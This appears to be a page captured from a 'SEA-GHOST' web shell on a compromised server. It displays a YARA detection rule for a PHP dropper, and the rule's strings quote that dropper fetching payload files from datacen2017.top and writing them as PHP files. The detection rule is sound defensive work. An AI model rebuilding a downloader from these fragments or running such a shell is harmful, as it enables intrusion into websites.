[ SEA-GHOST MINI SHELL]

Path : /proc/2/task/2/cwd/usr/local/scan/lw-yara/includes/
FILE UPLOADER :
Current File : //proc/2/task/2/cwd/usr/local/scan/lw-yara/includes/updw.yar

rule infected_05_26_18_updw {
   meta:
      description = "05-26-18 - file updw.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-05-29"
      hash1 = "ed154c632a07aae4b65eb20e5c903c0a6e21e4f9eddc254885ef4b4a57564812"
   strings:
      $s1 = "$url3=\"http://www.datacen2017.top/drupal/request-sanitizer.txt\";" fullword ascii
      $s2 = "$url4=\"http://www.datacen2017.top/drupal/update-core.txt\";" fullword ascii
      $s3 = "$url1=\"http://www.datacen2017.top/drupal/del.txt\";" fullword ascii
      $s4 = "$url2=\"http://www.datacen2017.top/drupal/dr.txt\";" fullword ascii
      $s5 = "file_put_contents(\"./request-sanitizer.inc\", $str_hm3);" fullword ascii
      $s6 = "file_put_contents(\"./update-core.php\", $str_hm4);" fullword ascii
      $s7 = "file_put_contents(\"./del.php\", $str_hm1);" fullword ascii
      $s8 = "file_put_contents(\"./dr.php\", $str_hm2);" fullword ascii
      $s9 = "echo \"download is fail\";" fullword ascii
      $s10 = "if($filesize1 == '104'&& $filesize2 == '3202'&& $filesize3 == '2990'&& $filesize4 == '2275'){" fullword ascii
      $s11 = "curl_setopt($curl, CURLOPT_HEADER, false);" fullword ascii
      $s12 = "$data=curl_exec($curl);" fullword ascii
      $s13 = "$filesize4=abs(filesize(\"./update-core.php\"));" fullword ascii
      $s14 = "echo \"download is sucesss.\";" fullword ascii
      $s15 = "$filesize3=abs(filesize(\"./request-sanitizer.inc\"));" fullword ascii
      $s16 = "$str_hm1 = curl_get($url1);" fullword ascii
      $s17 = "$str_hm2 = curl_get($url2);" fullword ascii
      $s18 = "$str_hm3 = curl_get($url3);" fullword ascii
      $s19 = "$str_hm4 = curl_get($url4);" fullword ascii
      $s20 = "$filesize1=abs(filesize(\"./del.php\"));" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 3KB and
         ( 8 of them )
      ) or ( all of them )
}

SEA-GHOST - SHELL CODING BY SEA-GHOST